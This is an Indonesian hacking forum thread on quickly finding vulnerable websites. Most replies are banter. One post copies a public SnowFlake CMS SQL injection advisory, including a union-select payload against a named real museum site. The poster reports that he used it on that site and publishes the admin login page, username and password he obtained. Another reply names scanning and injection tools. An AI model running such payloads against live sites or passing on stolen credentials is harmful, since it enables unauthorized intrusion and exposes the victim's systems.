cara cari vlun web dgn cepat

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
User avatar
andryh4ever
Posts: 181
Joined: Tue Dec 15, 2009 3:08 pm
Location: Kendawangan, Kab. Ketapang, Kalimantan Barat
Contact:

Re: cara cari vlun web dgn cepat

Post by andryh4ever » Wed Jun 30, 2010 10:55 pm

:circle: :circle
Let's Join with us on http://www.borneocrew.org/

..::: Hanya Ing!n Menul!$ Apa Yang Ing!n Aku Tul!s :::..

[*] Visit me on http://pl4nkt0n767.blogspot.com [*]
[*] Visit me on http://spyc0dz.blogspot.com [*]

RJ-45
Posts: 78
Joined: Thu Dec 17, 2009 2:29 pm

Re: cara cari vlun web dgn cepat

Post by RJ-45 » Thu Jul 01, 2010 6:52 pm

mantap semua deh.........!

User avatar
Nol Sembilan Tiga
Posts: 141
Joined: Wed Apr 07, 2010 1:19 pm
Location: MaNad0
Contact:

Re: cara cari vlun web dgn cepat

Post by Nol Sembilan Tiga » Thu Jul 01, 2010 10:03 pm

warxdoyo... :ngakak: :ngakak: :ngakak:
numpang post om/// ngakak lagi.....
keep share and "funky" om2... xixixixixiixi
-==Hanya Ingin belajar dan belajar==-

warxdoyo
Posts: 85
Joined: Mon Jun 21, 2010 8:39 pm
Contact:

Re: cara cari vlun web dgn cepat

Post by warxdoyo » Fri Jul 02, 2010 10:47 am

Nol Sembilan Tiga wrote:warxdoyo... :ngakak: :ngakak: :ngakak:
numpang post om/// ngakak lagi.....
keep share and "funky" om2... xixixixixiixi

iah dehhhhhhh kk yang master,,, aku kan masi blajar maklum masi newbie :circle: :circle: :circle: :circle: :circle:


tapi aku akan slalu :tapa: :tapa: :tapa: :tapa: :tapa: :tapa: untuk bisa lebih bisa lagi dari yang lain

cyber_terror1st
Posts: 144
Joined: Fri Apr 30, 2010 8:35 pm

Re: cara cari vlun web dgn cepat

Post by cyber_terror1st » Sun Jul 04, 2010 8:36 pm

dasar juga\\


hehehe ikutan nyambung aja nih om
sori ya
i'm cyber_terror1st and i proud what i suppoust to be

m1cR0_J
Posts: 22
Joined: Tue Feb 02, 2010 4:41 pm

Re: cara cari vlun web dgn cepat

Post by m1cR0_J » Thu Jul 15, 2010 3:09 pm

nice share.. :tapa:

User avatar
Nol Sembilan Tiga
Posts: 141
Joined: Wed Apr 07, 2010 1:19 pm
Location: MaNad0
Contact:

Re: cara cari vlun web dgn cepat

Post by Nol Sembilan Tiga » Mon Jul 19, 2010 11:58 am

xixixix.. gw suka ma warxdoyo keknya semangat skali... semangat trus ya om... kawan2 dsini bisa banyak membantu kok... kalo mo cari bugs banyak tanya2 ma om j0k3r.. :love: :love:
-==Hanya Ingin belajar dan belajar==-

User avatar
j0ck3r
Posts: 331
Joined: Wed Jun 02, 2010 4:51 pm
Location: diantara kedamaian dunia underground
Contact:

Re: cara cari vlun web dgn cepat

Post by j0ck3r » Wed Jul 21, 2010 2:14 am

[quote="Nol Sembilan Tiga"]xixixix.. gw suka ma warxdoyo keknya semangat skali... semangat trus ya om... kawan2 dsini bisa banyak membantu kok... kalo mo cari bugs banyak tanya2 ma om j0k3r.. :love: :love:[/quote]
:malu: :malu: :malu: :malu:
Biarkan mereka tidak mengerti apa-apa.Biarkan mereka bilang saya kurang pergaulan atau introvert.Peduli apa saya dengan mereka?Inilah duniaku.Dunia yang tersusun dari angka 0 dan 1.
My Blog
Add Me

User avatar
darkslayer100
Posts: 32
Joined: Mon Jul 27, 2009 8:17 pm

Re: cara cari vlun web dgn cepat

Post by darkslayer100 » Wed Jul 21, 2010 5:24 pm

mmhh.. mungkin klo boleh saya tambahkan. Salah satu cara cepat untuk menemukan web yg vulner adalah dengan melihat-lihat daftar bug di database web security seperti: securityreason.com , milw0rm, dll

misalnya,, mumpung saya baru buat thread yg agak nyambung nich.
ceritanya saya nggak tau nich mau narget apa dan siapa. Y udah saya pilih random target yg ada di securityreason.com

Lalu saya membaca2 exploit nya dan saya menemukan sesuatu yg menarik. :kaca: yaitu: SnowFlake Content Management System SQL Injection Arrow di yang bisa anda baca di http://securityreason.com/wlb_show/WLB-2010070111

berikut isinya:

Code: Select all

SnowFlake - SQL Injection.txt

#################################################################
# Exploit Title: Powered by SnowFlake Content Management System SQL
Injection
#
# Date: 19th july 2010
#
# Author: Dinesh Arora
#
# Critical:high
#
# Affected / Tested Version : 1.0 beta5.2
#
# Sample Affected Parameter: uid
#
# contact: [email protected]
#
# Greetz to :b0nd, Fbih2s,Beenu,Charles ,j4ckh4x0r, punter,eberly
#
# Shoutz to : http://www.garage4hackers.com , www.beenuarora.com
#
# POC:
http://www.skimuseum.org/page.php?cid=galleries&uid=1+and+1=2+union+sel
ect+1,concat%28version%28%29,0x3a,database%28%29,0x3a,user%28%29%29,3,4,5,6
,7--
#
#
#################
hohoho.. tumben2an di kasih demo websitenya: :kaca:
OK.saya pun langsung mencoba dan. . . ,
ternyata website nya masih vulner
admin page: skimuseum.org/admin.php
user: admin
pass: nesm123

Waktu yg di butuhkan untuk mencari vuln web adalah 2-3 menit (hitungan waktu tidak menggabunggkan waktu untuk melakukan dumping database)


mohon maaf jika kurang membantu :maaf:

d1kz
Posts: 107
Joined: Fri Jul 24, 2009 3:50 pm
Location: B4t4v14
Contact:

Re: cara cari vlun web dgn cepat

Post by d1kz » Wed Jul 21, 2010 11:48 pm

klo scan situs yg vulnerable pke nikto kk salah 1 tool yg sering di pke, klo schemafuzz stau saya bwt injector SQL Injection ja,, :putusasa: :putusasa: :putusasa:

CMIIW
::. Ikuti slalu kata hati .::

Post Reply

Return to “Web Hacking”